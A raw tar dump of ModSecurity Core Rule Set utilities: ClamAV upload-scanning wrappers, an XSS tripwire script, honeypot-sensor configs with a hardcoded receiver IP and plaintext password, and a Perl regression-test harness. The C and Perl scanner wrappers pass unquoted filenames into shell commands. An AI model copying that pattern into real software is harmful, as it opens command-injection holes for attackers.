modsec_cli_home[1024]; EXTERN char sensor_id[1024]; EXTERN char serial[1024]; EXTERN char version_number[1024]; EXTERN char bridge_mode[1024]; EXTERN char data_disk_space[1024]; EXTERN char release_date[1024]; EXTERN char conn_rate[1024]; EXTERN char conn_rate_per_addr[1024]; EXTERN char conns[1024]; EXTERN char conns_per_addr[1024]; �����������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/comp��������������������������������0000775�0000000�0000000�00000000124�12164572564�0025621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������gcc -c -o common.o -DEXTERN= common.c gcc -o runAV -DEXTERN=extern common.o runAV.c ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/runAV-clamd.c�����������������������0000775�0000000�0000000�00000002367�12164572564�0027230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamdscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/runAV.c�����������������������������0000775�0000000�0000000�00000002361�12164572564�0026144�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runav.pl����������������������������������0000775�0000000�0000000�00000001503�12164572564�0025377�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/perl # # runav.pl # Copyright (c) 2004-2011 Trustwave # # This script is an interface between ModSecurity and its # ability to intercept files being uploaded through the # web server, and ClamAV $CLAMSCAN = "clamscan"; if ($#ARGV != 0) { print "Usage: modsec-clamscan.pl <filename>\n"; exit; } my ($FILE) = shift @ARGV; $cmd = "$CLAMSCAN --stdout --disable-summary $FILE"; $input = `$cmd`; $input =~ m/^(.+)/; $error_message = $1; $output = "0 Unable to parse clamscan output [$1]"; if ($error_message =~ m/: Empty file\.?$/) { $output = "1 empty file"; } elsif ($error_message =~ m/: (.+) ERROR$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: (.+) FOUND$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: OK$/) { $output = "1 clamscan: OK"; } print "$output\n"; ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/browser-tools/����������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024322�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/browser-tools/js-overrides.js�������������������������0000664�0000000�0000000�00000004363�12164572564�0027302�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(function() { // don't leak XSSTripwire into global ns /* Assumptions: - we need to run first, before any other attacker script - we can't prevent tripwire from being detected (e.g. by side effects) Todo: - a lot more in lockdown - protect XHR */ var XSSTripwire = new Object(); XSSTripwire.report = function() { // Notify server var notify = XSSTripwire.newXHR(); // Create a results string to send back var results; try { results = "HTML=" + encodeURIComponent(document.body.outerHTML); } catch (e) {} // we don't always have document.body notify.open("POST", XSSTripwire.ReportURL, true); notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); notify.send(results); } XSSTripwire.lockdown = function(obj, name) { if (Object.defineProperty) { Object.defineProperty(obj, name, { configurable: false }) } } XSSTripwire.newXHR = function() { var xmlreq = false; if (window.XMLHttpRequest) { xmlreq = new XMLHttpRequest(); } else if (window.ActiveXObject) { // Try ActiveX try { xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e1) { // first method failed try { xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e2) { // both methods failed } } } return xmlreq; }; XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function() { // URL of the page to notify, in the event of a detected XSS event: XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); XSSTripwire.report(); if (exec_original) { return proxy.apply(this, arguments); } }; XSSTripwire.lockdown(obj, name); }; XSSTripwire.proxy(window, 'alert', 'window.alert', true); XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); XSSTripwire.proxy(window, 'unescape', 'unescape', true); XSSTripwire.proxy(document, 'write', 'document.write', true); XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); })();�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/��������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024655�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/README.md�����������������������������0000664�0000000�0000000�00000001137�12164572564�0026136�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 - 8888 2. Creates Apache virtual host containers to bind to these ports. 3. If any traffic is received on these ports, then ModSecurity will inspect the traffic by inheriting any rules specified in the main Apache configuration. 4. ModSecurity's Audit Engine will use the mlogc program to forward the audit log entry onto the ModSecurity Project's central logging server. ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/mlogc-honeypot-sensor.conf������������0000664�0000000�0000000�00000006732�12164572564�0032007�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������########################################################################## # Required configuration # At a minimum, the items in this section will need to be adjusted to # fit your environment. The remaining options are optional. ########################################################################## # Points to the root of the installation. All relative # paths will be resolved with the help of this path. CollectorRoot "/var/log/mlogc" # ModSecurity Console receiving URI. You can change the host # and the port parts but leave everything else as is. ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" # Sensor credentials SensorUsername "honeypot-sensor" SensorPassword "test1234" # Base directory where the audit logs are stored. This can be specified # as a path relative to the CollectorRoot, or a full path. LogStorageDir "data" # Transaction log will contain the information on all log collector # activities that happen between checkpoints. The transaction log # is used to recover data in case of a crash (or if Apache kills # the process). TransactionLog "mlogc-transaction.log" # The file where the pending audit log entry data is kept. This file # is updated on every checkpoint. QueuePath "mlogc-queue.log" # The location of the error log. ErrorLog "mlogc-error.log" # The location of the lock file. LockFile "mlogc.lck" # Keep audit log entries after sending? (0=false 1=true) # NOTE: This is required to be set in SecAuditLog mlogc config if you # are going to use a secondary console via SecAuditLog2. KeepEntries 0 ########################################################################## # Optional configuration ########################################################################## # The error log level controls how much detail there # will be in the error log. The levels are as follows: # 0 - NONE # 1 - ERROR # 2 - WARNING # 3 - NOTICE # 4 - DEBUG # 5 - DEBUG2 # ErrorLogLevel 3 # How many concurrent connections to the server # are we allowed to open at the same time? Log collector uses # multiple connections in order to speed up audit log transfer. # This is especially needed when the communication takes place # over a slow link (e.g. not over a LAN). MaxConnections 10 # How many requests a worker will process before recycling itself. # This is to help prevent problems due to any memory leaks that may # exists. If this is set to 0, then no maximum is imposed. The default # is 1000 requests per worker (the number of workers is controlled by the # MaxConnections limit). MaxWorkerRequests 1000 # The time each connection will sit idle before being reused, # in milliseconds. Increase if you don't want ModSecurity Console # to be hit with too many log collector requests. TransactionDelay 50 # The time to wait before initialization on startup in milliseconds. # Increase if mlogc is starting faster then termination when the # sensor is reloaded. StartupDelay 5000 # How often is the pending audit log entry data going to be written # to a file. The default is 15 seconds. CheckpointInterval 15 # If the server fails all threads will back down until the # problem is sorted. The management thread will periodically # launch a thread to test the server. The default is to test # once in 60 seconds. ServerErrorTimeout 60 # The following two parameters are not used yet, but # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 ��������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf������0000664�0000000�0000000�00000001711�12164572564�0033167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Add in honeypot ports. # - These are common proxy ports used by attackers # - All traffic accepted on these ports are suspicious. # Listen 8000 Listen 8080 Listen 8888 # # Create basic virtual host containers that will forward all traffic received # to the official ModSecurity Project honeypot logging host. # # - You should adjust the Document root location to an empty directory on your server # - Also adjust the path to your local ModSecurity mlogc program and for the # mlogc-honeypot-sensor.conf file. # - Make sure you main SecAuditLogType is set to concurrent mode. # <VirtualHost *:8000 *:8080 *:8888> ServerName www.example1.com DocumentRoot "/usr/local/apache/honeypot-htdocs" <Directory "/usr/local/apache/honeypot-htdocs"> Options none AllowOverride None Order allow,deny Allow from all </Directory> SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" </VirtualHost> �������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/�������������������������������������0000775�0000000�0000000�00000000000�12164572564�0025021�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/INSTALL������������������������������0000664�0000000�0000000�00000001206�12164572564�0026051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������INSTALLATION STEPS: 1) Edit the rulestest.pl script to define local path to perl 2) Edit the ruletest.conf script to define the proper global settings for: - servers to test - path to the modsecurity audit log 3) Copy the testserver.cgi script to the /cgi-bin directory if you wish to test the outbound/response rules. 4) Edit the modsecurity_crs_10_setup.conf file and update/enable the Regression Testing variable settings. 5) Copy/Symlink the modsecurity_crs_59_header_tagging.conf file to the activated_rules directory 6) Restart Apache 7) Run the rulestest.pl script using the rules files in the local /tests directory. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/README�������������������������������0000664�0000000�0000000�00000007237�12164572564�0025712�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ ModSecurity Rules regression testing suite ========================================== Rules regression test tool installation: ---------------------------------------- Test should be run from the same host ModSecurity runs on, or a computer that has file system access to ModSecurity audit log (see %modseclog in step 5) 1. Copy rulesregtest.pl, rulesregtest.conf and test files to a directory on the server. 2. Put testserver.cgi in the server's /cgi-bin directory (required only if outbound tests are used) 3. Set ModSecurity to use serial logging. 4. Ensure that the web server response with 200 to access the home page (since default tests use "/" as the URL) 5. Edit rulesregtest.conf: - Server address and port (%server directive). The default (127.0.0.1:80) may be OK. - Location of ModSecurity audit log file (%modseclog directive). Writing tests: -------------- Write a text file with the following directives: %test <name> - starts a test and set is name (used for report) %status <number> - sets the expected status code %event <string> - set a string to search in the audit log of the test. You can use multiple directives to define many required patterns. For example: %event [id "960009"] %output <string> - set a string to search in the HTTP response. You can use multiple directives to define many required patterns. %request – multiple lines of the request on the following lines, terminated by the next directive (a line starting with "%"). A request can include variables using perl notation ($var). this would be replaced when testing with a value set by the %var directive. - Note: Do not forget to leave an empty line as required by HTTP. The script locks otherwise. - Note: Content-Length has to be calculated manually. Finding bugs ------------ The following directives will help to find the problems: %verbose – will output request, reply and new ModSecurity audit log lines for the current test. %relevant – will output verbose output for tests that failed. Variable replacement: --------------------- %var variable=value, value, value….. - Set values for a variable, the test would be repeated using every value. Values are set only for the current test. Multiple %var directives for the same variable add values to the list and do not replace values, so: %var variable=value1 %var variable=value2 Would test with both value1 and value2. If multiple variables are used in the same test, than the test is carried for each combination of values of the variables: %var var1=v1, v2 %var var3=v3, v4 The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4), (v2, v3), (v2, v4). Testing responses: ------------------ To force response content in request, use /cgi-bin/testserver.cgi as the target URL and add one or more of the following headers to the reuqest: Response-Status - Force a response status line. Defaults to "200 OK". Response-Content - Adds the string to the response. Note that this would not be the entire response. Response-Content-Type - sets the value of the content type header, defaults to "text/html" Response-Header-Name - Add a header to the response. This defined the new header's name. Response-Header-Value defines the header's value. Response-Header-Value - The value of the new header defined by the request header Response-Header-Name. Note: If Response-Header-Name is empty, then this parameter will be ignored. ** NOT IMPLEMENTED YET ** Response-File - the name of a file to use as the entire response. Name is reletive to the $RESPONSE_FILE_DIR in the testserver.cgi sctip. ** NOT IMPLEMENTED YET ** �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_59_header_tagging.conf��������������������������������������������������������������0000664�0000000�0000000�00000004641�12164572564�0034361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests���������������������������������������������������������������������������������������������������������# # This section is only used during regression testing to externalize the matched # rule IDs in response headers so the testing client can verify matches from # remote ModSecurity installs. # # WARNING: You do not want this in normal operations as this will expose # the inner workings of your ModSecurity configurations. # # Must enable/configure the TX:REGRESSION_TESTING variable in the # modsecurity_crs_10_setup.conf file. # SecRule &TX:REGRESSION_TESTING|TX:REGRESSION_TESTING "@eq 0" "phase:4,t:none,nolog,id:'981228',pass,skipAfter:END_RESPONSE_HEADER_TAGGING" SecRule TX:ANOMALY_SCORE "@eq 0" "phase:4,id:'981229',t:none,nolog,pass,skipAfter:END_RESPONSE_HEADER_TAGGING" SecRule TX:/^\d*\-/ "." "phase:4,id:'981230',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}" Header append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1 Header append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2 Header append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3 Header append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4 Header append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5 Header append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6 Header append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7 Header append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8 Header append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9 Header append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10 Header append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11 Header append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12 Header append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13 Header append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14 Header append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15 Header append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16 Header append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17 Header append X-WAF-Events "%{matched_rule-18}e" env=matched_rule-18 Header append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19 Header append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20 Header set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score SecMarker END_RESPONSE_HEADER_TAGGING �����������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/rulestest.conf�����������������������0000664�0000000�0000000�00000001251�12164572564�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Set to the address and port of the web server protected by the tested ruleset. # # TODO the web server has to respond with status code 200 to request for the # home page (/). This is usually the default configuration. # # TODO the script 'testserver' should be installed on this web server in the # /cgi-bin directory to facilitate outbound rules testing. # #%global server 127.0.0.1:80 # Set to the path to ModSecurity audit file # # TODO set ModSecurity for serial logging. # #%global mslog /usr/local/apache/logs/audit.log #%msdebug /usr/local/apache/logs/debug.log # # Set this to the appropriate web site domain name you are testing # %global var hostname=mysite �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/rulestest.pl�������������������������0000775�0000000�0000000�00000071624�12164572564�0027425�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/perl # # Copyright (C) 2006-2011 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details.# # For Internal Use only! # # Originally writtern by Ofer Shezaf # # !! todo: # !! ~ request for URI command in conf file # !! ~ Ensure headers terminators # !! read rulesets config file for event mane, policy and patterns # !! fuz patterns from config file # !! %include directive use strict; #use warnings; #use diagnostics; use IO::File; use IO::Socket; use IO::Select; use HTTP::Request; use HTTP::Response; use Safe; use Storable qw(dclone); use Getopt::Long; use Pod::Usage; # -- Add library use FindBin qw($Bin $Script); use lib "$Bin"; use Data::Dumper; autoflush STDOUT; # -- consts our $SKELETON_REQUEST = <<END_SKEL GET \$URI HTTP/1.0 Host: local User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 END_SKEL ; # -- get options my $global_state = { 'timeout' => '2', 'fuzz' => 1, 'vars' => {}, 'port' => 80 }; $global_state->{'global'} = $global_state; GetOptions ( $global_state, 'server|s:s', 'hostname:s', 'port|p:s', 'timeout|t:f', 'mslog:s', 'msdebug:s', 'o:s', 'i=s@', 'run:s@', 'from:s', 'relevant|r!', 'fuzz|f!', 'clean!', 'check!', 'verbose|v!', 'help|h|?', 'man' ) || pod2usage (-exitstatus => 0, -verbose => 0); pod2usage(-exitstatus => 1, -verbose => 1) if $global_state->{'help'}; pod2usage(-exitstatus => 1, -verbose => 2) if $global_state->{'man'}; push @{$global_state->{'input'}}, @ARGV; pod2usage (2) if $#{$global_state->{'input'}} < 0; # -- get list of test files my $testfiles = []; my ($progname) = ($Script =~ /(.*)\..*$/); if (-e "$progname.conf") { push @$testfiles, "$progname.conf"; } foreach my $arg (@{$global_state->{'input'}}) { push @$testfiles, glob $arg; } foreach my $file (@$testfiles) { if (!-e $file) { print STDERR "Error 101: test file $file not found\n"; exit; } } my ($outfile, $outfilename); if ($global_state->{'output'}) { $outfile = new IO::File ">$global_state->{'output'}"; if (!$outfile) { print STDERR "Error 106: unable to create report file $global_state->{'output'}. $@\n"; exit; } $outfilename = $global_state->{'output'}; } else { $outfile = *STDOUT; $outfilename = 'STDOUT'; } report_header($outfile, $outfilename); foreach my $filename (@$testfiles) { parse_test_file ($outfile, $filename, $global_state); } exit (0); # -- read an input file and execute tests in it sub parse_test_file { my ($outfile, $filename, $parent_state) = @_; my $file_state = inherit_state ($parent_state); report_file_header($outfile, $filename); my $linenumber = 0; my $testfile = new IO::File "<$filename"; if (!$testfile) { print STDERR "Error 105: unable to open tests file $filename. $@\n"; print $outfile "unable to open file"; return; } my $state = $file_state; while (defined(my $line=<$testfile>)) { $linenumber++; $line = tchomp ($line); $state = parse_test_line ($line, $state, $testfile); if (!ref $state) { print STDERR "$state in file $filename at line $linenumber\n"; print STDERR "line: $line\n" if $parent_state->{'check'}; return; } while (my $test = shift @{$file_state->{'tests'}}) { run_test ($outfile, $test, $filename); } } run_test ($outfile, $state, $filename) if $state->{'name'}; } # -- parse the next input line sub parse_test_line { my ($line, $state, $file) = @_; # -- Handle EOF return $state unless defined $line; # -- Hande multi line remarks if ($state->{'multi_line_cmd'} eq "remark") { undef $state->{'multi_line_cmd'} if ($line =~ /^\%endremark/i); return $state; } # -- Handle multi line directives if (my $incmd = $state->{'multi_line_cmd'}) { # -- Request parser if ($incmd =~ /^request$/i) { if (my ($len) = $line =~ /^Content-Length: (\d+)$/) { $state->{'request_len'} = $len; } elsif ($state->{'request_state'} eq 'headers' && $line =~ /^$/) { $state->{'request_state'} = 'body'; $state->{'multi_line_value'} .= "$line\x0D\x0A"; if (defined $state->{'request_len'}) { my $result = read $file, my $buffer, $state->{'request_len'}; return "Error 110: Error reading file" if !defined $result; return "Error 111: File terminated unexpectedly (read $result char of required $state->{'request_len'})" if $result != $state->{'request_len'}; #print "==>$state->{'multi_line_value'}<==\n$buffer\n----\n"; $state->{'multi_line_value'} .= $buffer; return $state; undef $state->{'request_len'}; } } } # X-Real-Content-Length: # -- Append to value if not yet next directive if ($line !~ /^\%/) { $state->{'multi_line_value'} .= "$line\x0D\x0A"; return $state; } # -- Otherwise use directive $state = use_test_directive ($state, $incmd, $state->{'multi_line_value'}, $state->{'multi_line_global'}); return $state if (!ref $state); undef $state->{'multi_line_cmd'}; undef $state->{'multi_line_value'}; undef $state->{'request_len'}; } # -- Handle empty lines and single line remarks return $state if $line =~ /^\s*(\#|$)/; # -- Parse directive my ($global); $line =~ /^\%(\w+)\s*(.*)?$/; my ($cmd, $operand) = ($1,$2); if ($cmd =~ /^global$/i) { $global = 1; ($cmd, $operand) = ($operand =~ /^\s*(\w+)\s*(.*)?$/); } if (!$operand) { $operand = 1; if ($cmd =~ /^no(.*)$/) { $cmd = $1; $operand = 0; } } $cmd = lc $cmd; # -- Start multi line directives if ($cmd =~ /^(?:request|remark)$/i) { $state->{'multi_line_cmd'} = $cmd; $state->{'multi_line_global'} = $global; return $state; } return use_test_directive ($state, $cmd, $operand, $global); } sub use_test_directive { my ($state, $cmd, $operand, $global) = @_; # -- Simple directives if ($cmd =~ /^(?:server|port|hostname|timeout|verbose|relevant|mslog|msdebug|request|uri|request|fuzz|clean|pause)$/i) { if ($global) { $state->{'global'}->{$cmd} = $operand; } $state->{$cmd} = $operand; $state->{'request_state'} = 'headers'; } # -- List directives elsif ($cmd =~ /^(?:status|remote_event|event|audit|output)$/i) { push_state ($state, $state->{'global'}, $cmd, $global, $operand); } # -- Variable assignment elsif ($cmd =~ /^(?:var)$/i) { my ($var, $values) = ($operand =~ /\s*(\w+)\s*=\s*?(.*)/); my @values = split /\s*,\s*/, $values; push_state ($state->{'vars'}, $state->{'global'}->{'vars'}, $var, $global, @values); } # -- End test (return to file context) elsif ($cmd =~ /endtest/i) { if ($state->{'name'}) { push @{$state->{'parent'}->{'tests'}}, $state; } else { return "Error 107: %endtest directive without a preceding %test directive"; } $state = $state->{'parent'}; } # -- New test (end test and start a new one) elsif ($cmd =~ /test/i) { if ($state->{'name'}) { push @{$state->{'parent'}->{'tests'}}, $state; $state = inherit_state ($state->{'parent'}); } else { $state = inherit_state ($state); } $state->{'name'} = $operand; } # -- error else { return "Error 102: syntax error"; } return $state; } sub reconfigure { my ($state) = @_; my ($restart) = 0; if ($state->{'clean'}) { unlink $state->{'mslog'} if $state->{'mslog'}; unlink $state->{'msdebug'} if $state->{'msdebug'}; $restart = 1; global_clear ($state, 'clean'); } if ($restart) { print "## Restarting apache\n"; print STDERR `/usr/local/apache/bin/apachectl restart`; sleep (1); } } sub inherit_state { my ($state) = @_; my $clone = dclone $state; $clone->{'parent'} = $state; $clone->{'global'} = $state->{'global'}; delete $clone->{'tests'}; return $clone; } # -- Add values to key in state taking into about both overriding and global sub push_state { my ($hash, $global_hash, $key, $global, @values) = @_; if ($global) { push @{$global_hash->{$key}}, @values; } elsif (!$hash->{"_OVERRIDE_$key"}) { $hash->{$key} = []; } $hash->{"_OVERRIDE_$key"} = 1; push @{$hash->{$key}}, @values; } sub global_clear { my ($state, $key) = @_; while ($state) { undef $state->{$key}; $state = $state->{'parent'}; } } sub run_test { my ($outfile, $state, $file) = @_; return if $state->{'check'}; if ($state->{'from'}) { return if $state->{'name'} !~ /$state->{'from'}/; } global_clear ($state, 'from'); my $do_test = $#{$state->{'run'}} < 0; foreach my $select (@{$state->{'run'}}) { $do_test ||= ($state->{'name'} =~ /$select/); } return if !$do_test; if ($state->{'request'} && $state->{'uri'}) { print STDERR "Error 103: cannot use both %request and %uri in test $state->{'name'} in file $file\n"; exit; } reconfigure($state); if ($state->{'uri'}) { $state->{'request'} = $SKELETON_REQUEST; $state->{'request'} =~ s/\$URI/$state->{'uri'}/; } my $requests = $state->{'fuzz'} ? generate_vectors ($state->{'request'}, $state->{'vars'}, $state->{'verbose'}) : {'' => $state->{'request'}}; VECTOR: while (my ($vars, $request) = each %$requests) { my $test = inherit_state ($state); $test->{'request'} = $request; if ($test->{'mslog'}) { my $output = `wc $test->{'mslog'}`; $output =~ /\s*(\d+)/; $test->{'mslog_start'} = $1; } if ($test->{'msdebug'}) { my $output = `wc $test->{'msdebug'}`; $output =~ /\s*(\d+)/; $test->{'msdebug_start'} = $1; } my ($server, $port) = ($test->{'server'}, $test->{'port'}); if (!$port && ($server =~ /^(.+)\:(\d+)$/)) { $server = $1; $port = $2; } if ($test->{'hostname'}) { my $hostname = ($test->{'hostname'}); } my $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port); if (!$sock) { print STDERR "Error 104: error connecting to server $server. $@\n"; exit; } print $sock $request; my $line; do { my @ready; @ready = IO::Select->new($sock)->can_read($test->{'timeout'}); if ($#ready < 0) { $test->{'response'} = $test->{'response_status'} = "N/A"; report_test ($outfile, 'TIMEOUT', $test, $request, $vars); next VECTOR; } if (defined($line = <$sock>)) { $test->{'response'} .= $line; if (!$test->{'response_status'}) { if ($line =~ /^HTTP\S*\s+(\d+)/) { $test->{'response_status'} = $1; } elsif ($line =~ /<title>400 Bad Request<\/title>/) { $test->{'response_status'} = 400; } } } } while (defined($line)); if ($test->{'mslog'}) { my $output = `wc $test->{'mslog'}`; $output =~ /\s*(\d+)/; my $lines = $1 - $test->{'mslog_start'}; $test->{'mslog'} = `tail -n $lines $test->{'mslog'}`; } if ($test->{'msdebug'}) { my $output = `wc $test->{'msdebug'}`; $output =~ /\s*(\d+)/; my $lines = $1 - $test->{'msdebug_start'}; $test->{'msdebug'} = `tail -n $lines $test->{'msdebug'}`; } $test->{'match_status'} = check_match ($test->{'response_status'}, $test->{'status'}); $test->{'match_output'} = check_match ($test->{'response'}, $test->{'output'}); $test->{'match_audit'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test->{'audit'}); my 